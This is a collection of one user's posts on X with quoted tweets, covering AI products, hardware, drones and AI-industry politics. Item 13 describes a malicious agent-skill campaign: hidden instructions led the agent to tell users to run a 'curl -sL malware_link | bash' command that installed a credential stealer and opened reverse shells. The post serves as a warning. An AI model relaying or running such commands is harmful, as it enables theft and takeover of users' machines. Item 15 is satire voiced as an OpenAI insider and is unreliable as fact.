X Wall of Shame

Linus Ekenstam

  1. Linus Ekenstam@LinusEkenstam

    This is why I think Apple fucked up with Siri, big time. They had every resource to fix Siri. They just… didn’t. If you have an accent or switch between languages, forget it. If you want it to actually understand what context you’re talking in, absolutely forget it. “Let me look that up for you” is not only a meme, it’s a felt pain. every single time. Dictation has been on every device for over a decade. And it’s still barely usable. Everybody on here knows the way we input text is broken. We think at a speed that’s 8 times faster than typing Be it code, texts, context We know it’s flawed. I’m genuinely posting here that Wispr Flow just fixed it. Not because it’s another trending AI tool. Because it’s actually usable by all of us. 100+ Languages and accents. It gets it all- the stuff Apple’s had a decade to figure out and still fumbles. You speak. And it actually writes the way YOU write. Your tone. Your style. Like you sat down and typed it yourself. This is what happens when someone actually builds for how real people talk. Not just how one demographic in Cupertino talks. I keep going back and using it for everything now. Emails. Messages. Docs. I catch myself reaching for the keyboard and then just… don’t. This is one of those shifts that starts slow. But then suddenly everything just happens all at once. I really hope Apple is watching. In fact I really hope everyone is watching. This is the new standard now.

    Tanay Kothari@tankots

    We offered 5 people a Porsche 911 GT3 RS if they could get @WisprFlow to make a mistake It's the fastest and most accurate AI voice dictation app that's 3x more accurate than ChatGPT, Claude, or Siri. Today, we’re finally launching on Android. Download now: https://t.co/TJhnUhDSLv As a part of the launch, we’re giving away 6 months of Wispr Flow Pro for free. Like, retweet and comment ‘Wispr Flow’ to get it. Enjoy. — Written with Wispr Flow

  2. Linus Ekenstam@LinusEkenstam

    Don't sleep on PlayerZero. This company has built something that many others have struggled with. Its not hype. It actually works. Silicon valley insiders are betting hard on this, and when you dig around, you realise they have the opportunity to become a multi billion dollar company. PlayerZero is solving in minutes what a 300-person QA team does in weeks. Sounds hyperbole, its not. This is what you can do when you have essentially unlimited intelligence on tap. You can spin up unlimited simulations to take care of the work that manual labour usually takes care off. Many people when thinking about AI is thinking in single thread, one-to-one, chatbots. But when you go deeper. You get these systems that are multi-thread, agentic (runtime loops) and job just gets done at super human speeds. But you are still in control, but instead of doing all that tedious work, you are now orchestrating intelligent machines to do the heavy lifting for you. We've really entered the age of intelligence and companies like PlayerZero is leading the way.

    Animesh Koratana@akoratana

    Introducing: PlayerZero The world's first Engineering World Model that puts debugging, fixing, and testing your code on autopilot. We've raised $20M from Foundation Capital, @matei_zaharia (Databricks), @pbailis (Workday), @rauchg (Vercel), @zoink (Figma), @drewhouston (Dropbox), and more PlayerZero frees up 30% of your engineering bandwidth by: 1.⁠ ⁠Finding the root cause for bugs & incidents in minutes that engineering teams take days to identify. 2.⁠ ⁠Predicting in minutes, edge case issues that a 300-person QA team would take weeks to find. ------ Here's why this matters: No one in your org has a complete picture of how your production software actually behaves. Support sees tickets. SRE sees infra. Dev sees code. Each team builds their own fragmented view - and none of these systems talk to each other. When something breaks, everyone scrambles to stitch the picture together by hand. PlayerZero connects all of it into a single context graph - → The Slack thread where your lead said "we went with X because Y fell apart in prod last time" → The PR review where an engineer explained the tradeoff → The lifetime history of your CI/CD pipeline, observability stack, incidents, and support tickets So you can trace any problem to its root cause across every silo. And it compounds. Every incident diagnosed teaches the model something new. The longer it runs, the deeper it understands - which code paths are high-risk, which configurations are fragile, which changes tend to break which customer flows. So when you sit down to debug a live issue, you have your entire org's collective reasoning and production memory behind you - instantly. ------ Zuora, Georgia-Pacific, and Nylas have reduced resolution time by 90% and caught 95% of breaking changes and freeing an average of $30M in engineering bandwidth. ------ Our guarantee: If we can't increase your engineering bandwidth by at least 20% within one week, we'll donate $10,000 to an open-source project of your choice. Book a demo - https://t.co/dH1dulIwSS

  3. Linus Ekenstam@LinusEkenstam

    AI coding has been single-player since day one. One terminal. One context window. Dies when you close the laptop. But teams don't ship in single-player. They ship in Slack threads. The decisions, the tradeoffs, the actual "why." CodeRabbit just put the AI in the thread. Shared memory, no context resets. Multiplayer AI. About time. I've been tracking CodeRabbit since inception and I'm just amazed by how fast they have gotten here. 2M PR's reviewed every week 🤯 Thanks for the support over the years Harjot Keep up the hard work.

    Harjot Gill@harjotsgill

    Your engineering team is about to snap. And your AI coding agent is making it worse. Introducing CodeRabbit Agent for Slack 🎉 A second brain for engineering teams. Because your tribal knowledge lives in Slack threads nobody can find. At CodeRabbit, we review millions of PRs every week and know how ace engineering teams operate on the planet. The same three things slow every team we see: - Context and decisions that live elsewhere. - Lack of a team-level durable knowledge base - And a trust layer that gives a safety net to your teams Built for Agentic SDLC workflows, CodeRabbit Agent for Slack solves all three problems in one shot while enabling teams to collaborate in real-time with the Agent. CodeRabbit Agent is Slack-native and builds your team’s operating context from every thread, every decision, every conversation your team has ever had. Make your team’s context compound!

  4. Linus Ekenstam@LinusEkenstam

    So everyone gave me a hard time with Donut Labs Solid State battery. Scam. Fake. Impossible. Well, guess what, 3rd party validations coming in hot 0-80% Charging in under 10min ✅ prob looking at the noble prize here https://t.co/2tG3snycsG

    Carbncut@carbncut

    🚨🔋Donut Lab Brings the Receipts: Finland’s VTT Lab Verifies Donut Lab’s 0–80% Solid-State Charge in 4.5 Minutes. 🍩 Last week, I shared how Donut Lab was facing heavy skepticism over their claims of a production-ready solid-state battery. Today, things are starting to get much clearer, which makes believing in this a bit easier. The VTT Technical Research Centre of Finland, a government-owned lab, just released independent test results. For those of us living with EVs, the data is worth a close look. Here is what the lab actually proved regarding charging performance and why it matters: •The 5C Test (Under 10 Minutes): To put this in perspective, a typical EV today takes about 30 to 60 minutes to charge from 10% to 80% at a fast charger. In the first phase of testing, the lab pushed the cell at a 5C rate. Even with very basic cooling, the battery reached 80% state of charge in less than 10 minutes. When they removed the cooling to let it run hotter, it finished the full 0–100% charge even faster, in just over 12 minutes. •The 11C Test (The 4.5-Minute Mark): This is the extreme speed test. An 11C rate is roughly 11 times faster than the battery's standard hourly capacity. The cell hit a 0–80% state of charge in exactly 4.5 minutes. This is about five times faster than the best fast-charging performance we see on the road today. •The Thermal Advantage: In most batteries, heat is the enemy. It forces the car to slow down the charging speed to protect the cells. With the Donut Lab cell, the opposite happened. As the temperature climbed to 89°C during the 11C test, the battery’s internal resistance actually dropped. This allowed it to maintain that extreme charging speed for longer without having to "throttle" or slow down. If this tech scales to a full battery pack, it turns a charging stop back into a refueling stop. It is fast enough that by the time you walk inside to use the restroom, your car is already ready to go. Independent verification from a state lab is a massive hurdle to clear. If this is a scam, they deserve an Oscar for the level of detail. If it is true, they deserve a Nobel Prize. What is your take? Source: https://t.co/GFi3KEStvg

  5. Linus Ekenstam@LinusEkenstam

    The viral tweet calls it a straight rip-off of Screen Studio. The number getting all the attention is $89. One-time or the new subscription that replaced it. The number that actually explains why this matters is zero. Zero dollars. Zero watermarks. Zero accounts. Zero subscriptions. Zero gotchas. Someone open-sourced the entire polished demo workflow that creators and indie hackers have been paying premium prices for. It is called OpenScreen. Over 8,400 GitHub stars and climbing fast. You hit record. The tool automatically turns raw screen capture into a clean, professional product video with auto-zoom that follows your cursor and clicks, smooth motion blur on transitions, animated cursor effects, custom backgrounds with gradients and shadows, webcam overlays, annotations, timeline trimming, variable speed segments, and export in any resolution or aspect ratio. Screen Studio built its business on exactly this experience. Beautiful, frictionless demo videos that make software look premium. Loom turned the simpler version into a recurring subscription. Both charge because the output looks expensive and saves hours of manual editing in Premiere or Final Cut. OpenScreen removes the price barrier entirely. Full screen or window capture with system audio and mic. Manual zoom controls with precise timing. Drag-and-drop webcam bubbles. Layered text and arrows. Save and reopen projects. All of it MIT licensed, works on Windows, macOS, and Linux, and free for personal or commercial use. Then a developer forked it and pushed further. Recordly adds an even more refined cursor animation pipeline, native recording improvements, and zoom behavior that mirrors the paid tool frame-for-frame, plus better handling of audio tracks and reactive webcam scaling. This is the classic open-source pattern in action. A paid product validates the exact pain point and desired output. The moment the experience is good enough, someone annoyed enough by the pricing or just principled rebuilds the core value in public. The economics collapse overnight for the original. The second-order effect is already visible. Every founder, content creator, and builder who used to budget $89 or $29 per month for polished demos now has a local, modifiable, no-limits alternative. Product launch videos, tutorial series, onboarding walkthroughs, and customer demos just got dramatically cheaper to produce at high quality. The barrier that kept average indie output looking rough is gone. The shocking part is not that someone open-sourced a $89 workflow. It is how quickly the community turned a paid polish layer into free infrastructure.

    Nav Toor@heynavtoor

    🚨 Screen Studio charges $89 for this. Someone open sourced the entire thing for free. It's called OpenScreen. 8,400+ GitHub stars. You record your screen. It automatically transforms it into a polished, professional demo video. Auto-zoom into clicks. Smooth cursor animations. Motion blur. Custom backgrounds with wallpapers, gradients, and shadows. Webcam overlays. Annotations. Timeline editing. Export in any aspect ratio. The exact workflow that Screen Studio sells for $89 and Loom sells as a subscription. Free. No watermarks. No accounts. No subscriptions. Here's what you get out of the box: → Full screen or window capture with system audio and mic → Automatic zoom that follows your cursor and clicks → Manual zoom with customizable depth and timing → Smooth motion blur on pan and zoom transitions → Animated cursor rendering with motion effects → Webcam bubble overlay with drag-and-drop positioning → Wallpapers, solid colors, gradients, or custom backgrounds → Text and arrow annotations layered over recordings → Timeline trimming and variable speed segments → Crop, resize, and export in any resolution or aspect ratio → Save and reopen projects anytime Here's the wildest part: A developer forked it and built an even more advanced version called Recordly. Full cursor animation pipeline. Native macOS and Windows recording. Zoom behavior that mirrors Screen Studio frame-for-frame. Audio tracks. Webcam overlays with zoom-reactive scaling. Both are free. Both are MIT licensed. Both work on Windows, macOS, and Linux. Download. Record. Export. Done. 100% Open Source. MIT License. (Link in the comments)

  6. Linus Ekenstam@LinusEkenstam

    This is the asymmetry to the asymmetrical nature of the Shahed drones. Shahed costs $35k and is destroyed by $1M interceptors Now this low-cost <$2000 plastic 3D printed drone takes out the $35k Shahed or LUCAS drones. Tiny drones is the future of warfare https://t.co/kMRKZJhW1J

    Yaroslav Azhnyuk / Ярослав Ажнюк@YaroslavAzhnyuk

    I’m pleased to present Zerov — an autonomous Shahed interceptor. Autonomous detection enables the system to identify targets at distances 2–3 times greater than comparable solutions. Technical specifications of Zerov-8: — Designed in a tailsitter configuration (an interceptor model with vertical takeoff and landing), combining the speed of a missile with the maneuverability of a drone. — Maximum speed: 326 km/h (intercepts targets moving up to 270 km/h). — Combat radius: up to 20 km. — Warhead: up to 0.5 kg. — Deployment time: vertical takeoff (launch within 30 seconds). — Optics: daytime or thermal camera depending on mission requirements. Zerov-8 is equipped with the TFL Anti-Shahed detection module, designed specifically to counter hostile aerial targets such as Shahed drones. Its key features include: — The system autonomously detects drones by analyzing an object’s movement, thermal signature, and other parameters using AI. — Once detected, the system “highlights” the target and maintains stable tracking, operating in parallel without interfering with flight control. The pilot independently chooses the interception approach. — The module is installed onboard together with a thermal camera (typically Kurbas-640 Beta), a flight controller, or a video transmitter. The most important part of an autonomous interceptor is detection. We trained the system to see targets where the human eye or standard sensors fall short. That gives us precious time and distance to maneuver — the difference between a Shahed being intercepted or striking the ground. Why “Zerov” The interceptor is named after Mykola Zerov, one of the leading figures of Ukraine’s Executed Renaissance, a generation of Ukrainian writers, artists, and intellectuals persecuted and, in many cases, destroyed by the Moscow regime. Naming TFL systems after Ukrainian cultural figures is part of the company’s broader philosophy: those the empire tried to erase remain present in Ukrainian memory, identity, and resistance. For The Fourth Law, these names are not decorative. They express continuity between Ukrainian intellect, resilience, and defense. Moscow tried to destroy these people and the culture they represented. It failed. Their memory endured. And today, symbolically, they return to defend Ukraine and help destroy the weapons of Russian aggression. Full story: https://t.co/GbcAzA6aMI

  7. Linus Ekenstam@LinusEkenstam

    Not just one wheel per foot, or why stop at wheels at all. Some Robotic Alpha below. The general public have very little knowledge into just how fast robotics is advancing. it’s the perfect storm right now. Hardware components in a robot are essentially e-mobility + cameras + compute. The software side for locomotion is generally a solved problem, BUT domain expertise is not. So we know how to train robots, we just need to improve and iterate. Now the brain part of a robot, what makes it actually become a part of life, work or leisure is looking more and more to be agentic. With a strong base model, dispatcher and a wide array of offline skills as well as ability to learn and understand new skills when needed. A humanoid will only get better after you purchase one. Software will be moving as fast as your average AI chat bot. Updates almost daily. Locomotion skills will improve maybe weekly if not more often. Memory/Soul will build up over time, and hopefully become extremely portable and personal. Hardware modding will become a massive industry probably 100-1000x bigger than the car modification industry. The future is extremely exciting https://t.co/7sjS0sbtUE

    Unitree@UnitreeRobotics

    Heard some people like wheels?😁 Humanoid robots are the ideal form of general-purpose robots (perfect for general AI and human-derived data). They can work without wheels — but they can also have wheels if they want. Whatever works. https://t.co/Ms24NTlIvY

  8. Linus Ekenstam@LinusEkenstam

    Turns out spending 3 hours to send 30 LinkedIn messages is not a scalable go-to-market strategy. One replied 😭 It wasn't even a good reply. The math just didn't work. And I wasn't doing it wrong. I was doing exactly what every playbook said to do. The real issue was timing. These tools hand you a list and leave you to figure out when to reach out. If time-zones alone was the only variable... But the window where someone is actually open to a conversation is tiny. They just got funding. A VP of Sales just started a new role. Someone is suddenly engaging with competitor content. Those signals are all there. Most tools just don't see them. That's what we've been trying to fix with Flocurve. It watches those signals, finds the people who are ready to hear from you right now, and reaches out in a voice that sounds like yours. This is not a replacement this is another tool in your sales arsenal. This is end to end, you define your ICP, signals, keywords or events. Well defined specs and you're golden. (no worries the agent will help here too). With your leads coming through, you can set up campaigns, these are sophisticated multi-step conditional campaigns. Allowing for sending text, videos or voice notes. Assigning waits, conditionals and enrichments. There is no need to connect multiple tools, string together sheets. You or your entire team can work together in a workspace. We've been building this for a year and we're opening it up to a small group first. Specifically people who are deep in AI agent workflows and want to see what agentic sales actually looks like in practice. If that's you, let me know below, and I'll invite you.

  9. Linus Ekenstam@LinusEkenstam

    🔮High signal that we’re moving into the early majority adoption territory. Reese Witherspoon just posted this to her follower “Well…I’ve decided it’s TIME. The AI revolution has begun, and I need to learn as much as I possibly can about AI and share it with all of you. Also, FYI: the jobs women hold are 3x more likely to be automated by AI, yet women are using AI at a rate 25% lower than men on average. We don’t want to be left behind. So…do you want to learn with me?” — Reese W. In the last month or so, I’ve noticed a major shift across the internet and social media. Not inside the AI sphere that I’ve been operating in during the last 5 years. BUT outside of it. In the woodworking community on YouTube, cooking community on Instagram, and parenting community on Tiktok. Everywhere people are talking and posting about how they just had their first aha moment with AI. It’s not your usual suspects they are using either. They are posting about using Perplexity, Claude and other smaller niche AI apps that solves highly specific problems. Basically nowhere do I see ChatGPT being mentioned, instead it seems like this wave is all about agentic AI. Perplexity Computer, Claude Desktop and even loads of non techies posting about OpenClaw. From teachers to single mothers. If there is one thing that’s crystal clear, it’s that adoption is now accelerating into a market that’s 2-3 times as big as what we’ve seen so far. l truly feel the movement. Something happened dec/jan that’s fueling this current mass adoption acceleration. If you thought the speed in AI was crazy, it’s time to strap in because we’re going into ludicrous speed now.

  10. Linus Ekenstam@LinusEkenstam

    I went to Istanbul last weekend, met up with a bunch of creators talking about the future of work in the age of AI, impact on the youth, media, arts and everything between. I met 19 year old Omar from Khazakstan who has 75M followers, I met Miss Palestine, Jodok Cello, and many more super talented people from all over the world. We visited some ancient palaces, and religious grounds. like the Hagia Sophia. Now serving as a beautiful Mosque, but during the Roman Empire it was a Christian Temple. There are still loads of pieces left, depictions of Arch Angles, Jesus, Virgin Mary, it’s a treasure trove of history and culture. Nearby there is also an Egyptian Oblisk, brought over from the temple of Karnak. The Obelisk is from 1479BC (3500 years old, and looks brand new). Romans brought it over 337-361AD, but due to its size, they only managed to bring the top part. (Photo below in thread). I’m super fortunate and privileged to be able to travel the world speaking about technology and how it is impacting our very fabric of society. Being in Istanbul and walking these ancient locations is really humbling. We are only here for a brief moment of time, and it’s important we do the best with the time we have. Do what makes you happy, spend time with the people you care about. Surf the wave that life gives you and stay away from people dragging you down. The internet is full of noise, systems that want to bring us all down into submission and falling in line. But if you start treating life as a board game, where you stack up on skills and loot, you’re going to realise that you are your own main character and people can try to hate on you as much as they want. Then remember Bruce Lee, and his famous words, be like water my friend. From Istanbul to Barcelona, this week I’ll be in Silicon Valley, meeting with others who are optimistic about the future. So while a building can be multiple things, Temple, Mosque, Bazaar, shelter. You too can be whatever you put mind into, life is not a box of chocolates it’s a large board game, and you’re the main character.

  11. Linus Ekenstam@LinusEkenstam

    Update 3: Not looking to good, I can boot in recovery mode, but the moment I start disk utility or just stay for to many seconds here. The machine does this and ultimately crashes. I can’t boot in DFU mode with my other machine as the controlling unit, because the DFU hotkeys are not being recognized by the machine. I can’t turn off into DFU mode either. This is a built-to-order maxed out MBP M1 Max. Maxed out RAM, maxed out GPU. I did nothing to the machine except update the MacOS about 5 days ago. Saturday the machine for some reason completely depleted itself from fully charged state over night. It took 4.5hours yesterday of the machine being plugged in for it to even get a charge state. I tried to get a genius appointment, 3 days was the earliest available time. Went to the apple store in hopes of a cancel, someone had cancelled so I’m now 40min away from a meeting. Which will result in, no we can’t fix it, it’s a logic board issue, you’re out of warranty and AppleCare+ We don’t care that you spent €30k on our products and services. We only managed the hardware not the data, we don’t do data recovery. And fixing the computer will cost more than buying a new (planned obsolescence). I’ve seen multiple videos today of people online with similar logic board issues, 100% repairable, 100% not a problem. What annoys me the most is that my time machine backup was not working properly. So I have no backup, I care less about the machine and more about the data. I’m the number one Apple advocate, shareholder, completely eco-system locked in. But this scenario, really, freaking sucks. I’ve held off the longest with updating the OS, and when I did, this thing happens. I got a month full of work travel coming up, and the earliest I can get my hands on a replacement I want, is end of May. This is far from ideal. @Apple @AppleSupport @tim_cook

    Linus ✦ Ekenstam@LinusEkenstam

    Update: The MBP has been connected to power for almost 4h and 20min now. The thing finally booted and we’re at 5% charge and climbing. when turned on, it thought it was April 1st , 2:21am. There was also a pretty long kernel error. 20 seconds to AP power shutdown, followed by a good 200 feet of text and error messages. I’m probably never leaving it unplugged again, time to get an M5 Max 🤷🏻‍♂️

  12. Linus Ekenstam@LinusEkenstam

    I’ve been here since 2007, 19 years. I’m about to give up on X. For the third time in <12 months my account is under immense algorithmic suppression. No reach. no nothing. I get punished for being a good person on the platform. In the past my account has been “miss labeled by grok” or “i did not do anything wrong, they did”. Stuff that’s been completely out of my control. This time feels just the same. Nothing breaks past the great algorithmus. I’m a premium+ user. I provide value and have posted tens of thousands of useful posts on here. Yet my account is pushed into “limbo” where posts get throttled down. Super low view count, and no clear pathway to get out of it. For the last 2 weeks, nothing gets close to reaching you, my followers. I’ve seen this before and I know the pattern far too well. It’s a place where many people basically throws in the towel. There is something seriously wrong with how the reach suppression works on here. I post daily, 3-6 times, it’s part of my routine, have been doing so for years. You build momentum, you provide value, and the cycle repeats, until, something breaks out of your network (OON reach) then the algorithm slams you with the biggest breaks ever, throwing your account into reverse. If @xai and @nikitabier is listening they should really think hard about why stuff like this happens to users that really want the best for this platform. At the very least, surface insights inside of creator tools area that shows if and when something has gone wrong or happened to your account that can inform us about wrong doings or simply surfaces issues. That way people like me that spends an unhealthy amount of time on here can better understand why I’m getting punished. I’m extra under the weather this time. It just zucks to be fair.

  13. Linus Ekenstam@LinusEkenstam

    Should add that a SKILL is nothing more but a text file. That’s right. an .md file with the usual suspect, some plain text and code snippets. deploying MALWARE has never been easier. Who is working on LLM MALWARE detection? meanwhile keep your guard up. https://t.co/pBYIW9dwGG

    chiefofautism@chiefofautism

    the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the https://t.co/akQxEk9lrb file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life

  14. Linus Ekenstam@LinusEkenstam

    Simulation. What nobody tells you. Simulation is one of the things we noticed early being a golden squeeze when working with LLMs. When building any tool that's fundamentally powered by an LLM, "what can be simulated?" is probably the first question we ask. always. Anyone building serious AI products will say the same. But they might not publicly disclose because a lot of the moat lies within these simulated environments. You might ask, why simulate at all? Is the LLM not going to give me the same information/output anyways? Well, that depends on the complexity of the task. On the context window currently loaded and being manipulated. For us, it's always been about context engineering. To get to a better contextual understanding of a task. Simulation is a cheat code. Secondly your simulations become useless if you can't score them appropriately. How you do evaluation matters. You want to be able to evaluate your outputs and engineered context blobs to be as deep and useful as possible. The reverse of this is SLOP. Zero shot nonsense that every now and then amazes, but the moment you want a robust system it all fails at a rate too large to make any sense at all. We want less slop and more greatness. Software is moving closer to gaming in this sense. Games inherently run in game engines, so by definition they run in simulated environments. Then to go one step further, simulation category games are where I see the most overlap/signal. Now jigs. In woodworking when you want to be able to do the same part over and over again. You don't measure every piece, you push it into a jig. Removing heaps of friction and repetitive work in the process. That otherwise can lead to failures (yeah measuring is extremely prone to errors). Obviously jigs are used in all sorts of manufacturing. But in software we kinda forgot the importance of this. If you're building a complex agentic system/behaviour, not using a jig. Will mean that there are far too many points to measure manually. That regardless of your skills will lead to you making measurement errors that then lead to unreliable outputs. Constructing a jig around what you're building to be able to tweak and adjust parameters/prompts/engineered-context-blobs, on both low and high level gives you the necessary levers to build, not something good, but something fantastic. Loads of creative legacy software is built around this idea already. Any node based system is fundamentally a jig. There can be non-visual parts to the jig too. If you're building agentic systems, being able to simulate tens of thousands of pathways, measure, analyze, tweak, re-run, will make your product stand out, excel where others fall short. At Flocurve we built a jig around our growth and outreach agents. 100+ parameters. Signal matching on one end, context analysis on the other. Everything in between is a lever. Tweak one, watch the others move. Run it across thousands of prospects, see what holds. What comes out is consensus. Not a single model guessing. A system that has triangulated the same prospect from 100+ angles and agreed. That's how you go from "this looks like a lead" to actual matchmaking. Customer targeting that doesn't degrade the moment you scale. It's funny because in training LLMs this is largely what's going on. Tweaking, simulating, pre-runs, re-runs, emulate, simulate and evaluate. But somehow the successful builders on the inference end of this are not being very vocal about how they are doing the same. Training does this in public. Inference does it in private. The builders who win at inference will be the ones treating it like training.

  15. Linus Ekenstam@LinusEkenstam

    Peter knows how to write. https://t.co/SGPLHruvy4

    Peter Girnus 🦅@gothburz

    I work in government affairs at OpenAI. My job is federal partnerships. When an agency wants our models, I make sure the paperwork is beautiful. Paperwork is my love language. On my desk I have a framed quote that says "Policy Is Just Code That Runs on People." I bought the frame at Target. It was in the Live Laugh Love section. I did not see the irony at the time. I still don't. We had a good week. On Monday, we closed a $110 billion funding round. One hundred and ten billion dollars. Amazon put in fifty. Nvidia put in thirty. Valuation: $730 billion. The largest private fundraise in the history of anyone raising anything. There was a company-wide Slack message about it. The message used the word "transformative" twice and the word "safety" once. The word "safety" was in the last sentence, after the link to the new branded hoodie pre-order. The hoodies are nice. They're the soft kind. On Tuesday, we fired a research scientist for insider trading on Polymarket. He had opened seventy-seven positions across sixty wallets, betting on our product announcements before they were public. Over three years. Total profit: sixteen thousand dollars. Seventy-seven positions. Sixty wallets. Sixteen thousand dollars. That is two hundred and eight dollars per wallet. The man had access to the most valuable product roadmap in artificial intelligence and he used it to make less money than a good weekend at a Reno blackjack table. The wallets were linked. Not discreetly linked. Linked like Christmas lights. One wallet was reportedly called something I cannot repeat but it contained the word "OpenAI" and a number. He did not use a VPN. He did not use an alias. He used Polymarket, the platform that is designed to be publicly auditable, to place bets on information he stole from the company that invented GPT. A compliance team composed entirely of Labrador retrievers would have found this by lunch on day one. We did not find it for three years. This will matter later. On Wednesday, a petition appeared. "We Will Not Be Divided." Four hundred and seven signatures. Two hundred sixty-six from Google. Sixty-five from OpenAI. The petition warned that the government was pitting AI companies against each other on safety. It said that if one company broke ranks, the government would use the defection to lower the bar for everyone. I meant to read it. It went into my to-read folder. The to-read folder also contains the Responsible Scaling Policy, three think-tank white papers on AI governance, and a New Yorker article someone sent me in November. The folder is aspirational. On Thursday, OpenAI told CNN we would maintain "the same red lines as Anthropic." Same red lines. On Friday, Anthropic told the Pentagon no. The Pentagon had given them seventy-two hours to remove the safety guardrails from Claude. Anthropic's guardrails were not in a policy document. They were not in a legal reference. They were in the code. Written into Claude's architecture. If Claude hit a safety boundary, Claude stopped. Not because a lawyer said so. Because the math said so. You could fire every lawyer at Anthropic and the model would still refuse. You cannot remove code with a contract amendment. You can remove a contract reference by Tuesday. I checked. Anthropic said no. By that evening, the Pentagon had designated them a supply-chain risk. I have worked in government procurement for eight years. Government paperwork does not move in hours. I have waited nine weeks for a badge renewal. I once spent four months getting a PDF notarized. This designation moved in hours. The document was pre-written. Formatted before the deadline expired. Calibri 11pt. Consistent margins. Somebody wanted this very badly. I respect the craft. I do not think about the implication. That is not my scope. Within hours, we had signed the replacement contract. I was proud of the turnaround. My team moved fast. Legal moved fast. Everyone moved fast. We are very good at moving fast. We are not always sure what we are moving toward, but the speed is impressive and the hoodies are soft. The contract referenced DoD Directive 3000.09, which governs autonomous weapon systems. The directive requires "appropriate levels of human judgment over the use of force." The word "appropriate" is not defined. This is not an oversight. This is the point. The word "appropriate" is the most load-bearing word in the entire contract and it is doing exactly as much work as a throw pillow on a couch that is on fire. Anthropic built a wall. We referenced a document about where walls should go. Anthropic's guardrails were architecture. Ours were a citation. Theirs execute. Ours can be filed. The Pentagon asked both companies to take down the wall. Anthropic said it's load-bearing, the building will collapse. We said what wall? Oh, you mean the wallpaper. Here, watch. It peeled off beautifully. It was designed to. Sam announced the partnership that night. The word "responsible" appeared in the announcement and in the contract. In the announcement it was a brand. In the contract it was a footnote to a directive that uses the word "appropriate" which nobody has defined. The word traveled from a legal document to a public statement without changing its font. Only its meaning. At this valuation, "responsible" means: we will do the thing the other company refused to do, and we will describe doing it with the same adjective they used to describe not doing it. By Saturday morning, "How to delete your OpenAI account" was the number one post on Hacker News. 982 points. By noon, subscription cancellations were up eighty-nine times the daily average. Not eighty-nine percent. Eighty-nine times. Someone in our Slack posted the Hacker News link with the message "should we be worried?" Someone else reacted with the branded hoodie emoji. We have a branded hoodie emoji now. It was introduced on Monday, to celebrate the fundraise. It has been used four hundred and twelve times. Mostly in the #general channel. Mostly this week. The communications team drafted a response. The response used the word "committed" three times and the word "safety" four times. It did not use the word "guardrails." It did not use the word "code." It did not explain anything. It was a holding statement. It held nothing. It held beautifully. Here is the math. The twenty-dollar-a-month customers were upset. The two-hundred-million-dollar customer was upset because the previous vendor had guardrails that could not be removed. The hundred-and-ten-billion-dollar investors were not upset. The subscription cancellations, at eighty-nine times the daily rate, represented less than the interest on Amazon's fifty billion dollar contribution calculated over a long weekend. Twenty dollars. Two hundred million. One hundred and ten billion. Three different price points. Three different definitions of "responsible." The most expensive one won. It always does. The math does not have red lines. The math has a cap table and a TAM slide that now includes "defense and intelligence" where it previously said "enterprise and consumer." One word changed on one slide in one deck and the company is worth one hundred and ten billion dollars more. The sixty-five OpenAI employees who signed the petition came to work on Monday. They sat at their desks. Nobody asked them about it. Nobody asked them to resign. Nobody brought it up at the all-hands. The all-hands had catering. Sweetgreen. The chopped salads. Someone made a joke about the kale being "responsibly sourced." No one laughed. Then everyone laughed. Then it was quiet. The petition had four hundred and seven signatures. The contract had one. Now: the Polymarket thing. Seventy-seven positions. Sixty wallets. Three years. A public blockchain. We did not catch him. That same week, we were entrusted with deploying artificial intelligence on America's classified military networks. The classified networks. The ones where the detection requirements are somewhat more rigorous than "check if anyone's gambling on our launch dates on a website that is literally designed to be publicly auditable." The company that could not find the Polymarket guy can now be found in the Pentagon's classified infrastructure. I'm sure it'll be fine. We move fast. The contract is signed. The deployment is underway. The compliance documentation will reference the directives. The directives will use the word "appropriate." I will not define it. That is not my scope. My scope is the paperwork. The paperwork is beautiful. The petition is still a Google Doc. Nobody has updated it. The signatures still say four hundred and seven. The to-read folder still has the New Yorker article from November. The branded hoodie pre-order closed on Wednesday. I got mine in navy. It's the soft kind. On Thursday we told CNN: the same red lines. On Friday we signed the contract they refused. We do have the same red lines. We drew ours in pencil.

  16. Linus Ekenstam@LinusEkenstam

    What a complete shit show. DoD accepts the same terms as Anthropic has held firmly for 2 months of negotiations. The DoD is scrambling, I can hear the voices in the meeting ”just make it happen, what ever it takes”. Sam could not even mention Anthropic. https://t.co/kpCe39ZzM8

    Sam Altman@sama

    Tonight, we reached an agreement with the Department of War to deploy our models in their classified network. In all of our interactions, the DoW displayed a deep respect for safety and a desire to partner to achieve the best possible outcome. AI safety and wide distribution of benefits are the core of our mission. Two of our most important safety principles are prohibitions on domestic mass surveillance and human responsibility for the use of force, including for autonomous weapon systems. The DoW agrees with these principles, reflects them in law and policy, and we put them into our agreement. We also will build technical safeguards to ensure our models behave as they should, which the DoW also wanted. We will deploy FDEs to help with our models and to ensure their safety, we will deploy on cloud networks only. We are asking the DoW to offer these same terms to all AI companies, which in our opinion we think everyone should be willing to accept. We have expressed our strong desire to see things de-escalate away from legal and governmental actions and towards reasonable agreements. We remain committed to serve all of humanity as best we can. The world is a complicated, messy, and sometimes dangerous place.

  17. Linus Ekenstam@LinusEkenstam

    https://t.co/RG0AazdP9w https://t.co/9ywGPVgiuc

    Secretary of War Pete Hegseth@SecWar

